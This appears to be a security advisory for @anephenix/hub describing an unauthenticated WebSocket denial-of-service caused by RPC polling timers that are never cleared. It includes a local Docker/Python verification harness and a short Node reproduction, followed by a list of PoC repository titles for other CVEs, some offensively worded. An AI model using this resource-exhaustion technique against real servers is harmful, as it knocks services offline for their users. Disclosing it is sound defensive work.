### Summary `@anephenix/hub` starts a `setInterval` polling loop for every incoming WebSocket connection to request a client ID via RPC. If the remote client never replies — which requires no authentication or special configuration — the interval and the pending request object are never cleaned up, even after the socket is closed. An unauthenticated attacker who opens many WebSocket connections and ignores all server RPC messages will therefore cause the server to accumulate unbounded timers and heap entries, leading to CPU and memory exhaustion (DoS). ### Details When a client connects, `loadDefaultConnectionEventListeners` (registered in `src/lib/index.ts:128`) adds a connection listener that calls `requestClientId({ ws, rpc })` for every new WebSocket (`src/lib/index.ts:262`). `requestClientId` issues an RPC send for the `get-client-id` action (`src/lib/clientId.ts:112`), which internally calls `rpc.send`. Inside `rpc.send`, the payload is pushed onto `this.requests` (`src/lib/rpc.ts:282`) and `waitForReply` is invoked. `waitForReply` starts a `setInterval` that polls `responses[]` every 10 ms for a matching reply (`src/lib/rpc.ts:250`): ```ts // src/lib/rpc.ts:250–267 interval = setInterval(() => { const response = responses.find( (r) => r.id === id && r.action === action, ); if (response) { if (interval) clearInterval(interval); // ... resolve and cleanup this.cleanupRPCCall(response); } }, 10); ``` `clearInterval` is only called when a matching response arrives. There is no timeout path and no socket-close handler that clears either the interval or the `this.requests` entry. The `close` handler registered in `loadDefaultConnectionEventListeners` (`src/lib/index.ts:128–134`) only calls `pubsub.unsubscribeClientFromAllChannels`; it does not cancel pending RPC requests for that socket. **Data flow (source → sink):** 1. `src/lib/index.ts:269` — `wss.on("connection")` accepts any remote WebSocket (no authentication). 2. `src/lib/index.ts:272` — connection listeners are iterated and invoked. 3. `src/lib/index.ts:262` — `requestClientId({ ws, rpc: this.rpc })` is called for every connection by default. 4. `src/lib/clientId.ts:112` — `rpc.send({ ws, action: 'get-client-id' })` creates an RPC request. 5. `src/lib/rpc.ts:282` — `this.requests.push(payload)` registers the pending request. 6. `src/lib/rpc.ts:250` — `setInterval(..., 10)` begins infinite polling; cleanup only happens on a matching response. Socket close does not trigger cleanup. ### PoC **Prerequisites:** Docker must be available on the host. **Step 1 — Build the verification image:** ```bash docker build --no-cache \ -f vuln-001/Dockerfile \ -t hub-vuln-001:latest \ reports/npm_web_272_anephenix__hub ``` **Step 2 — Run the container:** ```bash docker run --rm --network none hub-vuln-001:latest ``` The container runs `verify.mjs`, which: 1. Starts a `Hub` server on a local port. 2. Opens a WebSocket and waits for the server's `get-client-id` RPC message without replying. 3. Closes the socket and waits 300 ms. 4. Inspects `hub.rpc.requests.length` — it must remain `1` even though `hub.wss.clients.size` is `0`. 5. Opens five more sockets the same way (batch), then verifies that `pendingRpcRequests` equals `6`. **Step 3 — Alternatively, run the Python orchestrator directly:** ```bash python3 vuln-001/poc.py ``` **Expected output (confirmed):** ```json { "snapshotAfterClose": {"clientState": 3, "serverClients": 0, "pendingRpcRequests": 1}, "snapshotAfterBatch": {"serverClients": 0, "pendingRpcRequests": 6, "expectedPendingRpcRequests": 6} } ``` `pendingRpcRequests` grows linearly with the number of unanswered connections and never decreases, confirming the unbounded resource leak. **Minimal inline reproduction** (without Docker, inside the repository after `npm ci && npm run build`): ```bash node --input-type=module - <<'EOF' import Hub from './dist/esm/index.js'; import { WebSocket } from 'ws'; const port = 8766; const hub = new Hub({ port }); hub.listen(); const ws = new WebSocket(`ws://localhost:${port}`); await new Promise((resolve) => ws.once('message', resolve)); ws.close(); await new Promise((resolve) => setTimeout(resolve, 300)); console.log(JSON.stringify({ serverClients: hub.wss.clients.size, pendingRpcRequests: hub.rpc.requests.length, })); hub.server.close(); process.exit(0); EOF ``` Expected: ```json {"serverClients": 0, "pendingRpcRequests": 1} ``` ### Impact This is an **unauthenticated Denial-of-Service** vulnerability. Any network-reachable `@anephenix/hub` server running with default configuration is affected. An attacker who opens a large number of WebSocket connections and never replies to the server's `get-client-id` RPC causes the server process to accumulate one `setInterval` timer (polling every 10 ms) and one heap object per connection indefinitely. With enough connections this exhausts CPU scheduling time and memory, making the server unavailable to legitimate clients. No authentication, special headers, or knowledge of internal protocol details are required — a plain WebSocket `connect` followed by silence is sufficient. ### Reproduction artifacts #### `Dockerfile` ```dockerfile FROM node:20-alpine RUN apk add --no-cache python3 make g++ WORKDIR /app # Install dependencies first for layer caching COPY repo/package.json repo/package-lock.json ./ RUN npm ci --ignore-scripts # Copy the rest of the source and build COPY repo/ ./ RUN npm run build # Copy the vulnerability verification script into /app so node_modules is resolvable COPY vuln-001/verify.mjs /app/verify.mjs CMD ["node", "/app/verify.mjs"] ``` #### `poc.py` ```python #!/usr/bin/env python3 """ VULN-001 PoC — Unauthenticated WebSocket RPC Waiter Resource Exhaustion (@anephenix/hub v0.2.15) Builds a Docker image containing the hub library and a verification script, then runs the container to produce deterministic evidence that hub.rpc.requests[] entries (and their backing setInterval timers) are never cleaned up when a WebSocket client disconnects without replying to the server's "get-client-id" RPC request. Usage: python3 poc.py Exit codes: 0 — vulnerability confirmed (PASS) 1 — not reproduced (FAIL) 2 — environment / build error """ import json import subprocess import sys from pathlib import Path # --------------------------------------------------------------------------- # Paths # --------------------------------------------------------------------------- SCRIPT_DIR = Path(__file__).resolve().parent REPO_ROOT = SCRIPT_DIR.parent # …/npm_web_272_anephenix__hub/ DOCKERFILE = SCRIPT_DIR / "Dockerfile" POC_TAG = "hub-vuln-001:latest" BUILD_CMD = [ "docker", "build", "--no-cache", "-f", str(DOCKERFILE), "-t", POC_TAG, str(REPO_ROOT), # build context = parent dir so COPY repo/ and COPY vuln-001/ both resolve ] RUN_CMD = [ "docker", "run", "--rm", "--network", "none", # no external network access needed POC_TAG, ] def banner(msg: str) -> None: print(f"\n{'='*60}\n {msg}\n{'='*60}") def run(cmd: list[str], **kwargs) -> subprocess.CompletedProcess: print("$", " ".join(cmd)) return subprocess.run(cmd, **kwargs) def build_image() -> None: banner("Phase 1 — Building Docker image") result = run(BUILD_CMD, capture_output=False) if result.returncode != 0: print("[ERROR] Docker build failed.", file=sys.stderr) sys.exit(2) print("[OK] Image built:", POC_TAG) def run_poc() -> dict: banner("Phase 2 — Running vulnerability verification inside container") result = run(RUN_CMD, capture_output=True, text=True) print("--- container stdout ---") print(result.stdout) if result.stderr: print("--- container stderr ---") print(result.stderr) # The container exits 0 on confirmed leak, 1 otherwise. if result.returncode == 2: print("[ERROR] Verification script crashed.", file=sys.stderr) sys.exit(2) try: data = json.loads(result.stdout) except json.JSONDecodeError as exc: print(f"[ERROR] Could not parse container output as JSON: {exc}", file=sys.stderr) sys.exit(2) return data, result.returncode def evaluate(data: dict, container_exit: int) -> tuple[bool, str]: """Return (passed, evidence_summary).""" after_close = data.get("snapshotAfterClose", {}) after_batch = data.get("snapshotAfterBatch", {}) leaked_single = ( after_close.get("pendingRpcRequests", 0) > 0 and after_close.get("serverClients", -1) == 0 and after_close.get("clientState", -1) == 3 # WebSocket.CLOSED ) leaked_batch = ( after_batch.get("pendingRpcRequests", 0) == after_batch.get("expectedPendingRpcRequests", -1) ) passed = leaked_single and leaked_batch and container_exit == 0 evidence = ( f"snapshotAfterClose={json.dumps(after_close)}; " f"snapshotAfterBatch={json.dumps(after_batch)}; " f"container_exit={container_exit}" ) return passed, evidence def main() -> None: build_image() data, container_exit = run_poc() banner("Phase 3 — Evaluating results") passed, evidence = evaluate(data, container_exit) if passed: print("[PASS] Leak confirmed: RPC waiter entries persist after socket close.") else: print("[FAIL] Leak NOT observed — check container output above.") return passed, evidence, data if __name__ == "__main__": passed, evidence, raw = main() verdict = "PASS" if passed else "FAIL" reason = ( "소켓이 닫힌 뒤에도 hub.rpc.requests[] 항목과 setInterval 타이머가 해제되지 않음이 " "런타임 검사로 확인됨. 단일 연결에서 pendingRpcRequests=1이 유지되고, " "배치 5개 추가 후 총 6개가 누적되어 선형 리소스 누수가 증명됨." if passed else "컨테이너 실행 결과에서 결정적 증거를 확보하지 못했음." ) result_path = SCRIPT_DIR / "phase2_result.json" phase2 = { "passed": passed, "verdict": verdict, "reason": reason, "build_command": " ".join(BUILD_CMD), "run_command": " ".join(RUN_CMD), "poc_command": f"python3 {Path(__file__).name}", "evidence": evidence, "artifacts": ["Dockerfile", "verify.mjs", "poc.py"], } result_path.write_text(json.dumps(phase2, indent=2, ensure_ascii=False)) print(f"\n[INFO] Results written to {result_path}") sys.exit(0 if passed else 1) ```
PoC: CVE-2026-38192
pluck-CMS-4.7.20-code-injection-vulnerability
PoC: cve-2024-55591-poc
Educational implementation in Go for CVE-2024-55591 (Fortinet FortiOS Authentication Bypass). Designed for security research, vulnerability assessment, and understanding WebSocket-based auth bypass mechanisms.
PoC: cve-2026-82329-jfrog-artifactory
CVE-2026-82329 JFrog Artifactory unauthenticated auth-bypass: reproducible Docker lab + URL-parameter validator PoC + patch-diff analysis
PoC: CVE-2026-82592
D-Link DIR-825M formDiskFormat stack overflow + command injection RCE PoC (CVE-2026-82592); for authorized security testing
PoC: My-Exploits
Metasploit modules, Python PoCs and throwaway Docker labs for four platform CVEs: Keycloak (CVE-2026-18963), Apache NiFi (CVE-2026-39816), HashiCorp Vault (CVE-2026-5006), HashiCorp Nomad (CVE-2026-7474).
PoC: CVE-2025-66478-PoC-Reverse-Shell
CVE-2025-66478 PoC
PoC: cve-writeups-and-pocs
CVE-2026-80724 PoC + full write-up — Linux kernel ptp/vmclock read-only mapping becomes writable (VM_MAYWRITE). Discovered, reported & fixed by Abdifatah Suruur (suruurism)
PoC: CVE-2026-79483-FastGPT-NoSQL-Injection
FastGPT Community Edition NoSQL Injection PoC (CVE-2026-79483)
PoC: givewp-cve-2026-82222-rce-lab
Authorized Docker lab and clean PoC for validating CVE-2026-82222 RCE in GiveWP 4.16.5.1 and the 4.16.7.2 fix.
PoC: CVE-2026-19745
Learn how I found my first two CVEs by pure accident.
PoC: cve-2026-23989-opencloud-lab
Reproduction lab (A/B Docker) for CVE-2026-23989 — OpenCloud / ownCloud Infinite Scale public-link scope-validation bypass in Reva
PoC: CVE-2026-21962-Blog
CVE-2026-21962 Açığı için blog sayfası oluşturdum.
PoC: PoC-and-yara-rules-of-CVE-2025-59528-Flowise-has-Remote-Code-Execution-vulnerability
poc and yara rules
PoC: CVE-2026-33017
CVE-2025-62593 — Ray Unauthenticated RCE Exploit is an unauthenticated remote code execution vulnerability in the Ray distributed AI compute engine.
PoC: CVE-2026-13753-poc
Poc of CVE-2026-13753
PoC: CVE-2026-82221
PoC for Unauthenticated Reflected Cross-Site Scripting (XSS) in RegistrationMagic WordPress Plugin
PoC: ActiveMQ-CVE-2023-46604
Exploit POC for Apache ActiveMQ CVE-2023-46604
PoC: gha-lab-0ba60e6456
Authorized security-research lab reproducing CVE-2024-39700 / GHSA-45gq-v5wm-82wg (JupyterLab extension-template update-integration-tests pwn request)
PoC: CVE-2026-36130
CVE-2026-36130
PoC: CVE-2026-31321
CVE-2026-31321
PoC: postgresql-cve-2026-14662
PostgreSQL の全文検索(tsvector/tsquery)に見つかった範囲外書き込み脆弱性 CVE-2026-14662 を、修正前(18.4)と修正後(18.6)を Docker で並べて動かして検証した記録と発表資料
PoC: CVE-2026-27472-and-CVE-2026-27474
PoC for CVE-2026-27472 and CVE-2026-27474
PoC: CVE-2026-27475
PoC for CVE-2026-27475
PoC: CVE-2026-18963
Unauthenticated account takeover via reset-credentials flow bypass
PoC: CVE-2026-0768
CVE-2026-0768 - Draft or TODO
PoC: CVE-2026-82329
CVE-2026-82329 - Draft or TODO
PoC: tomcat-line-check
CVE-2026-24880: does Apache's upgrade advice actually apply to your Tomcat? Detects the fix by class presence, not version comparison. Covers 7.0/8.0/8.5/9.0/10.0/10.1/11.0 lines.
PoC: log4j2-vuln-lab
CVE-2021-44228 (Log4Shell) 漏洞复现靶场 | SpringBoot + Log4j2 2.14.1 | 3 个攻击向量 PoC 验证
PoC: CVE-2021-3493-Exploit
It's a CVE-2021-3493 Exploit written in C
PoC: gha-lab-8e9316151c
Controlled security-research lab reproducing CVE-2024-1540 (GitHub Actions command injection in gradio-app/gradio deploy+test-visual.yml) — flattened snapshot of gradio-app/gradio @ f35f615e33a5dd90bfeb106b6f5dca689849fcef
PoC: gha-lab-6255f5fc33
Security-research lab reproducing CVE-2023-6572 (GHSA-gqvf-3hgp-5hxv): command injection in gradio-app/gradio's workflow_run handling of generate-changeset.yml
PoC: nextcloud-cve-2023-49792-research
A project analysis of CVE-2023-49792, inspired by a HackerOne report I have recently come across.
PoC: CVE-2026-30252
The ZenShare Suite application is vulnerable by a Reflected Cross-Site Scripting (XSS) vulnerability, affecting web application login and recovery password functionalities.
PoC: CVE-2026-30251
A reflected cross-site scripting (XSS) vulnerability in the login_newpwd.php endpoint of Interzen Consulting S.r.l ZenShare Suite v17.0 allows attackers to execute arbitrary Javascript in the context of the user's browser via a crafted URL injected into the codice_azienda parameter.
PoC: gha-lab-fb32aba4a3
Authorized lab reproduction of CVE-2023-26493 (GHSL-2023-027): command injection via github.head_ref in cocos-engine's <Web> Interface check pull_request_target workflow
PoC: CVE-2018-14667_Lab_POC
Demonstration of the expression language (EL) injection vulnerability CVE-2018-14667 using the photoalbum lab under Jboss application server
PoC: weakrng-sweep
Weak-RNG stream-sweep research (CVE-2026-71851 class): PRNG schemes x seeds -> BIP39 -> victim set membership
PoC: cve-2022-29117-assessment
CVE-2022-29117 (.NET Cookie-Handling DoS) Assessment, Understanding & Questions Framework
PoC: POC-CVE-2026-0073
Security research PoC for CVE-2026-0073: ADB authentication bypass verification
PoC: gha-lab-232af4821f
Security-research lab reproducing CVE-2021-4281 (GHSA-3796-3f93-cfvx): shell command injection via PR head-branch name in .github/workflows/combine-prs.yml (snapshot of BraveUX/for-the-badge @ 409c1fda). Do not use; authorized reproduction only.
PoC: CVE-2026-82222
GiveWP <= 4.16.7.1 Unauthenticated PHP Object Injection → RCE
PoC: CVE-2026-76569
Reflected XSS via search GET Parameter in Phoca Download
PoC: activemq-cve-lab
ActiveMQ CVE-2015-5254 模拟靶场 - 用于 CVE 测试评测和 SCA 扫描演示
PoC: ghostlock-x200-app
vivo X200 设备端一键 root App(Shizuku 授权 shell 域执行,CVE-2026-43499)
PoC: gha-lab-b9842b12c0
Authorized security-research lab reproducing CVE-2021-21423 (GHSA-gg2g-m5wc-vccq): projen rebuild-bot pwn request via issue_comment
PoC: gha-lab-e4a85583c3
Security-research lab reproducing CVE-2020-36762 (GHSA-h9gr-83jq-f3xc): bash command injection via github.event.comment.body in the comment workflow of ONSdigital/ras-collection-instrument
PoC: Root-My-Galaxy
KSU installer for supported Samsung Galaxy firmware with CVE-2026-43499
PoC: CVE-2026-78905-Facebook-Account-Takeover
Social Media Infrastructure Vulnerability Research. CVE-2026-78905: OAuth token reuse and session hijacking in Facebook's Graph API.
PoC: CVE-2026-78904-Digital-Dinar-Drain
CBDC Infrastructure Vulnerability Research. CVE-2026-78904: Infinite mint and redemption bypass in central bank digital currency APIs.
PoC: CVE-2026-78903-SWIFT-Kick-to-the-Creds
Offensive Research & Exploit Development. Vulnerability research, PoC development, and offensive tooling for financial infrastructure.
PoC: CVE-2026-60004-Gitea-RCE-PoC
🫖 Direct single-target Gitea CVE-2026-60004 RCE validation PoC
PoC: CVE-2026-60004-Gitea-Validator
🫖 Contract-correlated discovery and authorized validation tool for Gitea CVE-2026-60004
PoC: cve-2026-67363-67364
Balboa form Command Injection POC
PoC: Simulation-d-attaque-BlueBorne-sur-v-hicule-connect-
Simulation complète d'une attaque Bluetooth (CVE-2017-1000251) sur un véhicule autonome via CARLA Simulator ; exploitation de la vulnérabilité BlueBorne pour accéder au bus CAN et déclencher un freinage brutal, en environnement isolé (Kali Linux VM / VMware / Python).
PoC: CVE-2026-76581-Detector
Safe passive detector for identifying WPMU DEV Dashboard versions affected by CVE-2026-76581.
PoC: htb-machine-ringdown
Detailed design & exploitation writeup for Ringdown—an original Debian/Asterisk vulnerable machine featuring CVE-2024-42365 (AMI), PJSIP pre-hash cracking, and Fail2ban POSIX ACL privilege escalation.
PoC: gha-lab-83342297e0
Authorized security-research lab reproducing CVE-2024-41127 (GHSA-wcjf-5464-4wq9): poisoned pipeline execution via artifact-controlled code injection in ci-failure-comment.yml. Snapshot of monkeytypegame/monkeytype @ deeea0f.
PoC: WP2Shell-Scanner
Read-only CLI to check whether a WordPress site is exposed to WP2Shell (CVE-2026-63030 / CVE-2026-60137)
PoC: phpBB-CVE-2026-48611
Automated PoC for CVE-2026-48611 — phpBB OAuth login_link authentication bypass
PoC: Project-CVE-2026-45833
CVE-2026-45833 ChromaDB
PoC: CitrixBleedCVE-2026-8452-2025-5777
CitrixBleed Exploit Tool - CVE-2025-5777 & CVE-2026-8452. Unauthenticated remote memory read from Citrix NetScaler ADC & Gateway. Steal admin session tokens, extract nsroot hashes, dump secrets, and bypass MFA. Python 3 exploit with full memory parsing.
PoC: CVE-2026-76581
CVE-2026-76581
PoC: drupalgeddon2-cve-lab
Drupalgeddon2 CVE-2018-7600 vulnerable Drupal 7 lab
PoC: shellshock-cve-lab
Shellshock CVE-2014-6271 vulnerable CGI lab
PoC: log4shell-cve-lab
Log4Shell CVE-2021-44228 vulnerable lab
PoC: CVE-2026-18741
PoC CVE-2026-18741
PoC: CVE-2026-12513
CVE-2026-12513 Vulnerability Advisory & PoC — Discovered by Huynh Kien Minh (MinhHK).
PoC: ghostlock-oppo-watch3pro
CVE-2026-43499 on OPPO Watch 3 Pro
PoC: cve-2026-82222-poc
Public PoC for CVE-2026-82222
PoC: zk-xml-probe
Static XML fixtures for authorized bug bounty testing of XML parser behaviour (CVE-2026-45071).
PoC: SOC335-CVE-2024-49138-Investigation
SOC investigation of a CVE-2024-49138 exploitation alert using log analysis, threat intelligence, and endpoint containment.
PoC: papercut-toolkit
#PaperCut CVE-2026-81578 + CVE-2026-82078 Defense Toolkit 2 3 A **defensive** toolkit to check and understand exposure to the chained
PoC: PaperCut-CVE-2026-81578-82078
Security research tool for PaperCut CVE-2026-81578 & CVE-2026-82078
PoC: vankyo-s30-bootloader-unlock
Vankyo MatrixPad S30 (Unisoc SC9863A) — Bootloader unlock via CVE-2022-38694 FDL1 method
PoC: CVE-2026-21962-Blog
CVE-2026-21962 Açığı için blog sayfası oluşturdum.
PoC: hdwebmobile-formula-pricing
WooCommerce plugin: safe formula-based product pricing, closing CVE-2026-4001's eval()-based RCE
PoC: CVE-2026-82286-gpt-crawler-Arbitrary-File-Write
CVE-2026-82286 — gpt-crawler <=1.5.1 unauthenticated arbitrary file write via outputFileName (POST /crawl). PoC + self-contained Docker lab. CVSS 8.6, CWE-22.
PoC: CVE-2026-24061-payload
A PoC exploit for CVE-2026-24061 - GNU InetUtils telnetd Argument Injection Authentication Bypass
PoC: CVE-2026-66384
CVE-2026-66384 - Draft or TODO
PoC: CVE-2026-33017-PoC-Reverse-Shell
CVE-2026-33017 PoC Reverse Shell
PoC: CVE-2026-33057---Mesop-Unauthenticated-RCE-PoC-and-yara-rules
CVE-2026-33057 - Mesop Unauthenticated RCE PoC and yara rules
PoC: CVE-2026-10036-speechbrain-rce
SpeechBrain < 1.1.1 checkpoint metadata RCE via unsafe PyYAML parsing of CKPT.yaml.
PoC: CVE-2025-55182-poc
I know you are probably here from Hack the Box, if so, yes this one actually works.
PoC: Project-CVE-2026-50751
IKEv1 VPN scanners, attempts a Check Point authentication-bypass exploit, and includes internal network scanning and reverse-shell features.
PoC: CTT-Enhanced-CVE-2026-46339-Exploit-Engine
A specialized Python framework that executes unauthenticated remote code execution via the 9Router Model Context Protocol (MCP) bridge by deploying a 33-layer temporal phase cascade, Riemann-Hadamard dispersion, and an 11 ns wedge filter to bypass traditional proxy and process-monitoring defenses.
PoC: Zimbra-CVE-2026-73570-Rules
Wazuh Rules for Detection Zimbra (CVE-2026-73570).
PoC: CVE-2022-46169
Cacti 1.2.22 unauthenticated command injection
PoC: CVE-2024-23897
Jenkins CVE-2024-23897 — CSRF-crumb aware PoC
PoC: CVE-2025-10952-ml-logger-AFR
PoC for CVE-2025-10952 — ml-logger unauthenticated arbitrary file read. CVSS 5.3
PoC: CVE-2026-65643
CVE-2026-65643 - Draft or TODO
PoC: cve-2023-23397-detection-lab
Detection and mitigation research lab for CVE-2023-23397 using network and endpoint security telemetry.
PoC: fastjson-cve
fastjson-cve-2026-16723
PoC: CVE-2026-23751-poc
Patched RemotingClient to exploit CVE-2026-23751 (Tungsten Automation - Kofax Capture Unauthenticated File Read/Write and SMB coercion via .NET HTTP Remoting)
PoC: CVE-2023-27350-CVE-2023-27351
CVE-2023-27350, CVE-2023-27351 - PaperCut - Draft or TODO
PoC: Project-CVE-2026-33017
CVE-2026-33017 - Langflow Unauthenticated RCE Exploit
PoC: CVE-2026-70463
Testing CVE-2026-70463 by Fyyre
PoC: 2025-Oracle-SSO-LDAP-Attack-Post-Incident-Written-Report
Post-incident report analyzing the Oracle Cloud SSO/LDAP supply chain attack (CVE-2021-35587). Details the exploitation of legacy server infrastructure, impact across 140,000+ cloud tenants, root-cause findings, and phased mitigation strategies.
PoC: CVE-2026-20131-Post-Incident-Written-Report
Post-incident report on CVE-2026-20131 (CVSS 10.0), a Cisco FMC insecure deserialization vulnerability exploited by Interlock ransomware. Details root-cause analysis, lateral movement tactics, and emergency containment strategies.
PoC: ghostlock-pfem10
GhostLock (CVE-2026-43499 / IonStack) research for OPPO Find X5 Pro (PFEM10): exploit chain, progress, blocker log, and OPPO 5-series kernel notes
PoC: htb-labs-connected
Hack The Box Connected machine write-up featuring enumeration, CVE-2025-57819 exploitation, reverse shell, and privilege escalation to root via FreePBX and incron.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Get alerted for CVEs like this
Register your stack and get notified within minutes when a matching CVE drops.
Start monitoring free